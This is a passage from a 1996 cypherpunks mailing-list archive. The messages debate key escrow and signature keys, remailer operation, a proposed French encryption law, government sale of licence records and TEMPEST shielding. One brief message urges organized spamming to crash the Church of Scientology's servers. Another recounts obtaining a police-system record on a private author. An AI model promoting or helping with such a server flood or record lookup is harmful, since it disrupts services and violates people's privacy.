From: Carl Ellison <cme@ACM.ORG>
Date: Wed, 29 May 1996 09:36:28 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Clipper III analysis
In-Reply-To: <199605280545.WAA04738@comsec.com>
Message-ID: <v03006602add10d52d5cf@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


There were a number of flaws in that paper, but perhaps the most glaring to
me is that there are actually 3 classes of key:

the two you mentioned:
	communications key
	storage key
and
	signature key

Of these, you want key recovery *only* for storage keys.  You want to make
sure no one can get to your signature key.  Even the IWG paper notes that.
But the only use for a PKI of any form is for a signature key.  Once you
have your identity established somehow for a signature key, you can
generate and sign comm or storage keys at will.  Furthermore, if you lose a
signature key, there's no big loss.  You generate a new one and get a new
cert for it.  So there's *NEVER* a reason for key recovery for a signature
key -- the only keys for which there is a need for a PKI.

I find myself wondering.

Did some very clever crypto-theoretician plant this idea in their heads
(sig key database giving GAK) knowing that the structure had termites?

I first heard this from Micali...and here I always thought he was on their
side.  I may have misjudged the man. :)

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 29 May 1996 09:32:55 +0800
To: cypherpunks@toad.com
Subject: Remailer chain length?
Message-ID: <199605282112.QAA03652@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Mark,

Forwarded message:

> Date: Tue, 28 May 1996 16:21:22 -0400 (EDT)
> From: "Mark M." <markm@voicenet.com>
> Subject: Re: Quickremail v1.0b
> 
> > At 17:28 1996-05-27 EDT, E. ALLEN SMITH wrote:
> > >I'm planning on starting up a remailer, probably on Lance's machine (to
> > >take advantage of his expertise) sometime this summer. I do want to get PGP
> > >for the VAX before then, and the MIT site doesn't appear to have this code.
> > 
> > Why would anyone set up a remailer at Lance's (or Sameer's) machine?
> > They have remailers running already. If the thugs break root and obtain
> > one remailer key from a machine, they probably get all the keys on that
> > machine, compromising all the remailers in one single attack. Or am I
> > missing something? Is there any benefit of multiple remailers on a machine
> > where root is running his own remailer?
> 
> It's better than nothing.  And besides, the more remailers there are, the
> more difficult it is to do traffic analysis on remailer traffic.  Actually,
> its the more remailers people chain messages through, but there are software
> packages that can do this easily.  The more remailers there are, the longer
> remailer chains have the possibility of becoming.

If this is strictly true, why not simply run several instances of a remailer
on the same machine. Then randomly chain them prior to sending them off
site. This would be a lot cheaper and faster than trying to convince
hobbyist to set it up or businesses to to use their profit & legal council.


                                                        Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 29 May 1996 09:19:36 +0800
To: cypherpunks@toad.com
Subject: Re: Quickremail v1.0b
In-Reply-To: <2.2.32.19960528100951.0038fbb4@mail.pi.se>
Message-ID: <Pine.LNX.3.93.960528161631.176D-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 May 1996, Matts Kallioniemi wrote:

> At 17:28 1996-05-27 EDT, E. ALLEN SMITH wrote:
> >I'm planning on starting up a remailer, probably on Lance's machine (to
> >take advantage of his expertise) sometime this summer. I do want to get PGP
> >for the VAX before then, and the MIT site doesn't appear to have this code.
> 
> Why would anyone set up a remailer at Lance's (or Sameer's) machine?
> They have remailers running already. If the thugs break root and obtain
> one remailer key from a machine, they probably get all the keys on that
> machine, compromising all the remailers in one single attack. Or am I
> missing something? Is there any benefit of multiple remailers on a machine
> where root is running his own remailer?

It's better than nothing.  And besides, the more remailers there are, the
more difficult it is to do traffic analysis on remailer traffic.  Actually,
its the more remailers people chain messages through, but there are software
packages that can do this easily.  The more remailers there are, the longer
remailer chains have the possibility of becoming.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMatgVbZc+sv5siulAQEpcwP/Rrg6SqcC6ywc0TD0kERpVmuKCfRRbP5C
tcY6ImX33JAIWb+/anhl52r6IpMg8Xv75D+3jbhZO1yhbdeM3UEX3oeTmFrzr63a
x5WTb5mPRGBazYXZgfcP0kiBdzsMNCEtMHjefIpVDkOfcuoQrgZSUfPuYaGBF45W
WCVdxmVMqpo=
=zFgt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 29 May 1996 11:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: remail@c2.org Blocked From replay mail2news Gateway
In-Reply-To: <199605280420.GAA06863@basement.replay.com>
Message-ID: <Pine.LNX.3.93.960528162745.176E-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 May 1996, Anonymous wrote:

> It wasn't outgoing posts that I was worried about, so much as my
> replies that were being posted to alt.anonymous.messages via
> alpha.c2.org rather than being chained to me through e-mail.  I
> wonder how much (if any) mail I may have lost.  How long has this
> embargo been in effect?
> 
> Is there any chance (pretty please) that the obviously non-forged
> mail from alpha.c2.org to alt.anonymous.messages, such as that with
> "nobody@c2.org" in the From:  line, can be unblocked on a one-time
> basis, or have they already been consigned to the bit-bucket?

I think mail2news@anon.lcs.mit.edu and mail2news@myriad.alias.net accept
anonymous messages.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMatiOrZc+sv5siulAQEwnAP/dfmsuk/8tghjZMUE/HTl4EmN+hvSF2Qe
piEcVnt/LMTT94Je179HpQFOkAFCuMt3VMBnTrrum0f6wzimrOLdqPHCgNNdNTeh
6aeO2nidmuMmZVS1I1bM6EHCTg/c1th62gd+2+S/UEVTt6LKkaLRBQxq5eouCS07
ByvJlmrjXN8=
=FjQX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 29 May 1996 12:56:02 +0800
To: Carl Ellison <cme@ACM.ORG>
Subject: Re: Clipper III analysis
Message-ID: <199605290034.RAA26908@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:11 PM 5/28/96 -0400, Carl Ellison wrote:
>There were a number of flaws in that paper, but perhaps the most glaring to
>me is that there are actually 3 classes of key:
>
>the two you mentioned:
>        communications key
>        storage key
>and
>        signature key
>
>Of these, you want key recovery *only* for storage keys.  You want to make
>sure no one can get to your signature key.  Even the IWG paper notes that.
>But the only use for a PKI of any form is for a signature key.  Once you
>have your identity established somehow for a signature key, you can
>generate and sign comm or storage keys at will.  Furthermore, if you lose a
>signature key, there's no big loss.  You generate a new one and get a new
>cert for it.  So there's *NEVER* a reason for key recovery for a signature
>key -- the only keys for which there is a need for a PKI.

Carl is right.  They want to GAK all keys including signature keys.  Now
think, to whom in your life are you willing to grant unlimited power of
attorney?  Your spouse?  Your lawyer?  Your banker?  Your employer?  Your
government?

Giving away your signature key is worse.  Not only can any key holder act
FOR you, he can act AS you.  "We've got you cold perp.  You signed this
child porn that was posted to alt.binary.etc.  You can make your calls from
jail."  Who needs entrapment.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 29 May 1996 14:19:06 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960529005251.006cd984@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 AM 5/28/96 -0700, Sandy Sandfort wrote:

>that our privacy will be maintained.  Generally, it is 
>incumbunt upon us--not others--to secure our own privacy.

I'm in complete agreement here, and I'm willing to drop the thread here - I
don't think I have much else to add.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 May 1996 12:33:43 +0800
To: stewarts@ix.netcom.com
Subject: Re: Remailers - What exists?
Message-ID: <01I58Z1TPRZY8Y50T6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 28-MAY-1996 05:27:38.19

>It helps a lot to have an account that isn't your main email
>account, because it's going to get lots of junk in it
>that you want to discard most of, so you'd be better
>off without your real mail going there, unless you're
>a procmail wizard.

	A related question is about the cover traffic generators. With those,
I've gathered you've got the two choices of loops and nowhere-ending chains
(e.g., directing it to "nobody" on most systems). If it's done using a loop,
is there any way for a procmail script to determine that and toss them into
/dev/null?

>Mixmaster-style remailers are more secure than vanilla ones,
>but of course you need to use the Mixmaster client software
>to use them, which could be a problem if you're a DOS or Mac user.

	Or a VAX/VMS user; there are, I have been informed, enough
UNIX-specific system calls in Mixmaster that porting it isn't a trivial task. 

>- ability to mess with the sendmail logs
>- ability to tell the backup software not to back up your
>  spool directory (which would be Really Bad, especially
>  if your computer provider keeps backups forever.)
>  The alternative is to put it under /tmp somewhere,
>  and just make sure it recovers if too much stuff gets 
>  deleted by regular daemons.

	What mechanisms are available to make sure it will recover if /tmp
gets deleted? I suspect also that many ISPs might be quite willing not to
bother backing up some directory or another - it saves them time and space.
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 May 1996 11:29:41 +0800
To: matts@pi.se
Subject: Re: Quickremail v1.0b
Message-ID: <01I58Z8XIXP08Y50T6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"matts@pi.se"  "Matts Kallioniemi" 28-MAY-1996 06:08:28.40

>Why would anyone set up a remailer at Lance's (or Sameer's) machine?
>They have remailers running already. If the thugs break root and obtain
>one remailer key from a machine, they probably get all the keys on that
>machine, compromising all the remailers in one single attack. Or am I
>missing something? Is there any benefit of multiple remailers on a machine
>where root is running his own remailer?

	Well, the advantages are: A. I get Lance's help more quickly in setting
up this one, so I can later go to other machines (preferably out of the
country) and set things up the same way there (getting Mixmaster from an
out-of-US source, of course); and B. supporting the efforts of Sameer, Lance,
et al by paying them some money. While multiple ISPs are certainly
preferable (to avoid one rubber-hose (e.g., law enforcement) breaking from
getting everything), your argument assumes that all the machines at a given
ISP are linked together such that if one is broken, the rest are - which
isn't very good from a security standpoint, so I'd hope it _isn't_ the case. 

>The vax pgp is available at
>ftp://ftp.net-connect.net/pub/cypherpunks/pgp/vaxpgp262.tar.Z

	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Tue, 28 May 1996 22:19:04 +0800
To: cypherpunks@toad.com
Subject: France's proposed telecoms law
Message-ID: <199605280918.TAA17579@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



   Paris, May 23, 1996: There is an EC regulation called which applies to
all EC countries.
This restricts the use of cryptography in the context of weapons of
mass destruction, but not for any other purpose. The UK also has an
export licensing requirement which is similar in scope. France, on
the other hand, has much wider restrictions.  The EC regulation is
"Dual-Use and Related Goods (Export Control) Regulations" and the UK
is "Export of Goods (Control) Order".

   Attached is a message containing the pending French legislation,
followed by some comments. I hope this is helpful to readers on both
sides of the pond.

[Tuesday, 07 May 96 08:30:54 EST, "jean-bernard condat" <condat@atelier.fr>
writte:]
---------------
      Art. 12

      Article  28  of  the  Law No. 90-1170 dated December 29, 1990, on
      telecommunications regulation is hereby amended as follows:

      I - Section I is hereby amended as follows:

      1)  The  first  paragraph  shall  be  completed  by the following
      phrase: "Secret coding method denotes all materials  or  programs
      conceived or modified for the same purpose."

      2)  The  second  and  third paragraphs are hereby replaced by the
      following provisions:

      "To  preserve  the interests of national defense and the internal
      or  external  security  of  the  State,  while   permitting   the
      protection   of   information   and  the  development  of  secure
      communications and transactions,

      1) the use of a secret coding method or service shall be:

      a) allowed freely:

      -  if  the  secret  coding  method  or service does not allow the
      assurance of confidentiality, particularly when it  can  only  be
      used  to  authenticate a communication or ensure the integrity of
      the transmitted message;

      -  or  if  the  method or the service assures confidentiality and
      uses only coding conventions managed according to the  procedures
      and  by  an organization approved under the conditions defined in
      Section II;

      b)  subject  to  the authorization of the Prime Minister in other
      cases.

      2)  the  supply,  importation from countries not belonging to the
      European Community, and exportation of secret coding  methods  as
      well as services:

      a)  shall  require  the prior authorization of the Prime Minister
      when they assure confidentiality; the authorization  may  require
      the supplier to reveal the identity of the purchaser;

      b) shall require declaration in other cases."

      3)  A decree sets the conditions under which the declarations are
      signed and the authorizations  approved.   This  decree  provides
      for:

      a)  a  simplified  system  of  declaration  or  authorization for
      certain types of methods or services or for certain categories of
      users;

      b) the substitution of the declaration for the authorization, for
      transactions concerning secret coding methods or  services  whose
      technical  characteristics or conditions of use, while justifying
      a certain attention being paid with regard to the  aforementioned
      interests,  do  not  require  the  prior  authorization  of these
      transactions;

      c)   the   waiver  of  all  prior  formalities  for  transactions
      concerning secret coding  methods  or  services  whose  technical
      characteristics   or   conditions   of  use  are  such  that  the
      transactions are not capable of damaging the interests  mentioned
      at the beginning of this paragraph.

      II - Section II is hereby replaced by the following provisions:

      "II  -  Organizations  responsible  for  managing,  on  behalf of
      others, the coding  conventions  for  secret  coding  methods  or
      services  that  allow  the  assurance  of confidentiality must be
      approved in advance by the Prime Minister.

      They  are  obligated  to maintain professional confidentiality in
      the exercise of their approved activities.

      The approval shall specify the methods and services that they may
      use or supply.

      They shall be responsible to preserve the coding conventions that
      they manage. Within the framework of application of the  Law  No.
      91-646  dated  July  10,  1991, concerning the confidentiality of
      correspondence  sent  via  telecommunications,  and  within   the
      framework  of investigations made under the rubric of Articles 53
      et seq. and 75 et seq. of the Code of  Criminal  Procedure,  they
      must  release  them  to  judicial  authorities  or  to  qualified
      authorities, or implement them according to their request.

      They must exercise their activities on domestic soil.

      A  decree in the Council of State sets the conditions under which
      these organizations shall be approved, as well as the  guarantees
      which the approval shall require; it specifies the procedures and
      the  technical  provisions  allowing  the  enforcement   of   the
      obligations indicated above.

      III  -  a)  Without  prejudice  to the application of the Customs
      Code, the  fact  of  supplying,  importing  from  a  country  not
      belonging  to  the  European  Community,  or  exporting, a secret
      coding method or  service,  without  having  obtained  the  prior
      authorization mentioned in I or in violation of the conditions of
      the  granted  approval,  shall  be  punishable  by   six   months
      imprisonment and a fine of FF 200,000.

      The fact of managing, on behalf of others, the coding conventions
      for secret coding methods or services that allow the assurance of
      confidentiality,  without  having obtained the approval mentioned
      in II or in violation of the conditions of this approval,  shall
      be punishable by two years imprisonment and a fine of FF 300,000.

      The  fact of supplying, importing from a country not belonging to
      the European Community, or exporting, a secret coding  method  or
      service,  in order to facilitate the preparation or commission of
      a felony or misdemeanor,  shall  be  punishable  by  three  years
      imprisonment and a fine of FF 500,000.

      The  attempt to commit the infractions mentioned in the preceding
      paragraphs shall be punishable by the same penalties.

      b)  The natural persons guilty of the infractions mentioned under
      a) shall  incur  the  complementary  penalties  provided  for  in
      Articles   131-19,   131-21,  and  131-27,  as  well  as,  either
      indefinitely or for  a  period  of  five  years  or  longer,  the
      penalties  provided  for  in  Articles  131-33  and 131-34 of the
      Criminal Code.

      c)  Judicial  persons  may be declared criminally responsible for
      the  infractions  defined  in  the  first  paragraph  under   the
      conditions  provided  for  in Article 121-2 of the Criminal Code.
      The penalties incurred by judicial persons are:

      1)  the  fine according to the modalities provided for by Article
      131-38 of the Criminal Code;

      2)  the penalties mentioned in the Article L.  131-39 of the same
      code. The prohibition mentioned in 2) of this article  L.  131-39
      concerns  activities,  during  the  exercise  of which, or on the
      occasion of the exercise of which, the infraction was committed."

      III - Section III becomes IV.

      Its   last   paragraph   is  hereby  replaced  by  the  following
      provisions:

      "The  fact  of refusing to supply information or documents, or of
      obstructing the progress of the investigations mentioned in  this
      section  IV, shall be punishable by six months imprisonment and a
      fine of FF 200,000."

      IV - Section IV becomes V.

      After the word "authorizations," the words "and declarations" are
      hereby inserted.

      V - A section VI is hereby added, formulated as follows:

      "VI  -  The  provisions  of  this  article  shall  not hinder the
      application of the Decree dated April 18, 1939, establishing  the
      regulation of war materials, arms, and munitions, to those secret
      coding methods which are specially conceived or modified to allow
      or facilitate the use or manufacture of arms."

      VI  -  This  article is applicable to overseas territories and to
      the territorial commonwealth of Mayotte.

                    Copyright 1996 Steptoe & Johnson LLP

      Steptoe  & Johnson LLP grants permission for the contents of this
      publication to be reproduced and  distributed  in  full  free  of
      charge,  provided that: (i) such reproduction and distribution is
      limited to educational and professional non-profit use only  (and
      not  for  advertising  or  other  use); (ii) the reproductions or
      distributions make no edits or changes in this  publication;  and
      (iii) all reproductions and distributions include the name of the
      author(s) and the copyright notice(s) included  in  the  original
      publication.
  ---------------
In trying to analyze the impact of the proposed law, I would note
the following:

Section I:

Paragraph 1 (a), first bullet, seems to explicitly allow digital
signatures, and does not require that the secret keys used for such
purposes be escrowed.

Paragraph 1 (a), second bullet, in combination with Section II,
strongly hints at a requirement for key escrow. Conceivably,
depending on the details of Law No 91-646 dated July 10, 1991
concerning the confidentiality of correspondence sent via
telecommunications, the use of short keys that might expose
information to unauthorized individuals (a la the IBM masked DES
and Lotus Notes solution) might even be prohibited!

Paragraph 1 (b) provides an escape clause for certain favored
activities (and/or organizations?). Presumably international
standards such as Visa/MasterCard's SET, which apply strong
confidentiality to only certain data fields, notably the
cardholders account number, would be permitted under this kind of
an exception.  Banking transactions and other sensitive information
may also be excluded from the key escrow requirement, especially if
(since) the Government could subpoena the bank's records directly.
This is further borne out by paragraph 3, (a, b, and c).

Paragraph 1 seems to apply to the use of encryption, as opposed to
the supply, import, or export. However, unless such use is covered
by Law No. 91-646, the proposed amendment does not seem to apply
criminal or civil penalties to such use.

Paragraph 2 is interesting, in that it differentiates between
"supply" and "importing from countries not belonging to the
European community". This may be a techni-cality of the European
Community import/export laws -- perhaps importation from countries
within the European Community no longer has any meaning, since such
customs barriers were supposed to have been removed. I would
interpret "supply" to include the offering for sale, or even
distributing for free, such code, even by a French citizen. This
would therefore appear to apply to the (re-)distribution of PGP
and/or any home-grown French products, as well as any encryption
products originating within the EC. If so, this would seem to be
more even-handed with respect to imports from the US and elsewhere
than might otherwise appear, and may obviate any claim that the law
would violate the World Trade Organization's Most Favored Nation
agreements. The apparent import preference for EC products simply
reflect's France's obligation to allow the free flow of goods
within the EC.

Paragraph 3 seems to provide for some simplified administrative
mechanisms that may be less onerous than a case by case review. IN
US terms, this may be similar to requesting a commodity
jurisdiction from Commerce, rather than having encryption being
construed as following under the ITARs. If so, we should certainly
investigate these options. Subparagraphs b and c may apply to the
use of relatively short keys, or for transactions of limited scope,
e.g., for SET.

Section II defines conditions for establishing and approving escrow
agencies.  Given the requirement for "professional
confidentiality", I would not be at all surprised if the civil law
"notaires" didn't jump at the chance to get into this business.

The requirement that they exercise their activities on French soil
is rather obscure.  The prior language doesn't explicitly say that
anything about escrow, nor where the escrowed keys must be
maintained -- it only talks about the management of coding
conventions, and the requirement to comply with the requirements of
the Code of Civil Procedure, which presumably requires that they
divulge the keys and/or the text of any confidential messages upon
demand by a proper authority. But a literal reading of the text
would suggest that a standards organization that manages and
preserves the coding conventions would have to carry out their
activities on French soil, while the escrow repository might be
elsewhere.

Section III certainly makes it clear that they are serious about
all this.  The natural persons who have committed, or even
attempted to commit acts in violation of the Act are subject to
fines and imprisonment, and I would hazard a guess that the
Articles 131-33 and 131-34 would debar them from participating in
any future importing or exporting.

Corporations (judicial persons) may be held criminally responsible
for any infractions caused by their employees, and I would assume
that Article 131-39 would also lead to a debarment for future
import or export, in exactly the same manner as US export
violations would.

Section VI makes the Act applicable to overseas territories, which
means that some of the more obscure areas and countries would also
be covered, such as French Guiana, etc.

Disclaimer: I am not a French attorney, nor someone who is at all
knowledgeable about EC law. The preceding analysis should not be
construed as any kind of an official position.  Go get your own
hired guns if you need advice!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 29 May 1996 14:14:22 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960529023715.00b0a30c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 5/28/96 -0700, Bruce Baugh wrote:

>A separate problem arises when the government compels the disclosure of
>information for one purpose - getting a driver's license, say - and then
>turns around and sells it to others. It's much harder to either negotiate a
>new contract or go to a competitor when the other party is a government.

This is a problem in Oregon.  The database of drivers licences and
registered automobiles is sold openly by the state.  (You can also order a
copy on CD-ROM from a company based in Oregon as well...)  As far as I know,
there is no way to opt out of having your name sold to marketing firms.
These records are routinely purchaced by mail order houses for resale to
clients all over the country.  The cost is pretty minimal (under $200) and
you have to provide the media (usually two 9-track tapes).  The database
includes current address, vehicle licence number and the type of car that
you own (among other things).

The only way to not be on the list is to not have ID.  Not viable in todays
society.
---
|Coors - For people who don't want to think about what they are drinking.|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 May 1996 14:13:00 +0800
To: Cypherpunks@toad.com
Subject: Re: Clipper III analysis
Message-ID: <add106be0902100435f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 5/29/96, Bill Frantz wrote:

>Carl is right.  They want to GAK all keys including signature keys.  Now
>think, to whom in your life are you willing to grant unlimited power of
>attorney?  Your spouse?  Your lawyer?  Your banker?  Your employer?  Your
>government?
>
>Giving away your signature key is worse.  Not only can any key holder act
>FOR you, he can act AS you.  "We've got you cold perp.  You signed this
>child porn that was posted to alt.binary.etc.  You can make your calls from
>jail."  Who needs entrapment.

But, though things have gotten pretty bad these last 40 years, there are
still courts, expert witnesses, and standards for signature verification.
Experts are called upon to give testimony about the likelihood that a
signature is that of the person claimed (by one side or the other). Though
there have been few tests of digital signatures that I know of (I think
Utah has a law...), this government access to identities (GAI) will throw a
spanner in efforts to get digital signatures widely accepted.

Once it gets shown in open court that Joe Blow can claim he did not sign a
document and the government will have to admit that this is a possibility,
and admits that anyone in government with access to the escrowed data base
could have done the signing....well, digital signatures will lose much of
their value immediately.

Inasmuch as unforgeable digital signatures are critical for electronic
commerce, a fact even Clinton cannot ignore, I expect this weakness to help
sink Clipper III.

As Carl noted, Cypherpunk Deep Cover Agent Micali has been doing a good job
in planting logic bombs in these schemes...I urge we approve his bonus.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 May 1996 15:47:59 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <add11a2f0b021004c73c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 AM 5/29/96, Alan Olsen wrote:
>At 12:38 PM 5/28/96 -0700, Bruce Baugh wrote:
>
>>A separate problem arises when the government compels the disclosure of
>>information for one purpose - getting a driver's license, say - and then
>>turns around and sells it to others. It's much harder to either negotiate a
>>new contract or go to a competitor when the other party is a government.
>
>This is a problem in Oregon.  The database of drivers licences and
>registered automobiles is sold openly by the state.  (You can also order a
>copy on CD-ROM from a company based in Oregon as well...)  As far as I know,
>there is no way to opt out of having your name sold to marketing firms.
>These records are routinely purchaced by mail order houses for resale to
>clients all over the country.  The cost is pretty minimal (under $200) and
>you have to provide the media (usually two 9-track tapes).  The database
>includes current address, vehicle licence number and the type of car that
>you own (among other things).

As I said, I favor "data privacy laws" when they deal with government use
of mandatory data (but not in the case of illegalizing the mere
"remembering" of data obtained non-coercively).

The problem has been made worse by "revenue enhancement" policies by
various govenmental agencies. Local and regional governments have
discovered they can make a few extra bucks by selling data bases they
acquired through government power.

Here in California there are restrictions on DL records, following the use
of DL records to allow a guy to track down an actress, Rebecca Shaefer, and
then kill her.

(But this doesn't stop such abuses. A couple of years ago I obtained the
NLETS (National Law Enforcement Telecommunications System) printout for the
extremely reclusive and unseen-since-1957 author Thomas Pynchon. He lived a
few miles from me, in Aptos, on an old logging road.)

The problem of government records being "open to the public" of course is a
two-edged sword. We want government to not operate in secret on the one
hand, but we are naturally horrified when it is possible to go to the right
office of government and look at lists of all the women who received
abortions in county hospitals.

I place no faith in government to protect my privacy.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 29 May 1996 16:13:16 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Tempest Info [ELECTRICAL NOISE]
Message-ID: <199605290454.VAA11416@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 5/28/96 -0500, Andrew Loewenstern
<andrew_loewenstern@il.us.swissbank.com> wrote:
>Bill Stewart writes:
>>  Also, of course, your electrical power system needs to be
>>  shielded and filtered, so only 60Hz gets through, unless you
>>  plan to stick to laptops and bring in spare battery packs.
>At HoHoCon a few years ago, someone did a tempest demo and mentioned that  
>signals could be recovered from water pipes!  Fire sprinkler systems were  
>specifically mentioned...

Yup.  When you're installing a shielded room with waterpipes, it's
best to use a chunk of plastic pipe just outside the shieldwall,
and you need to make sure the plumbers use teflon tape instead of
pipe dope ( unless it was the other way around; it's been a while.)

>Theres a lot of different avenues for your eminations to be recovered, some 
>you may not have thought of.  Like crypto, tempest is economics.

And like crypto, there are lots of diddly little things you've got
to check to make sure you've done _all_ of them correctly.
Unlike crypto, however, it's generally easy to find out if you've
made a mistake; big mistakes peg your test meter, little ones
require you to wave the meter around everywhere and watch for
little motions.  Also unlike crypto, little mistakes generally
won't lose the whole game for you; if somebody's got to watch for
six months to accumulate enough leaked electrons to find out the
Secret Plans, and you haven't noticed the black van with all the
antennas parked out in your parking lot by then, you've got far
more serious troubles than just a few stray electrons :-)

You may also notice that you can't park your black antenna-van too near
the Pentagon.  It's not just because they think you're hauling fertilizer;
electromagnetic emanations follow this nice square-law that means that
a few hundred meters of extra distance makes it _much_ harder to detect
the signal you're looking for, as well as mushing it together with
all the other stray signals from the building.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kashi <youssefy@ucla.edu>
Date: Wed, 29 May 1996 18:19:18 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT VIA E-MAIL]
Message-ID: <2.2.32.19960529062105.0070a4b8@pop.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 5/28/96 +0000, you wrote:
>This is a post from Jon Noring (noring@netcom.com) about the recent 
>spamming of alt.religion.scientology.  I thought he summed the 
>situation up very well.

Why don't we get together an organized spamming of the CoC's servers?

Let's give them a taste of their medicine!

I bet that we can make their servers crash before they know what him them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 29 May 1996 16:40:36 +0800
To: cypherpunks@toad.com
Subject: [crypto] crypto-protocols for trading card games
Message-ID: <Pine.SUN.3.91.960528235540.23126A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's an interesting problem:

In the not too distant past there was a fad for collectible trading card 
games, the most famous of which was Magic, The Gathering (tm). These 
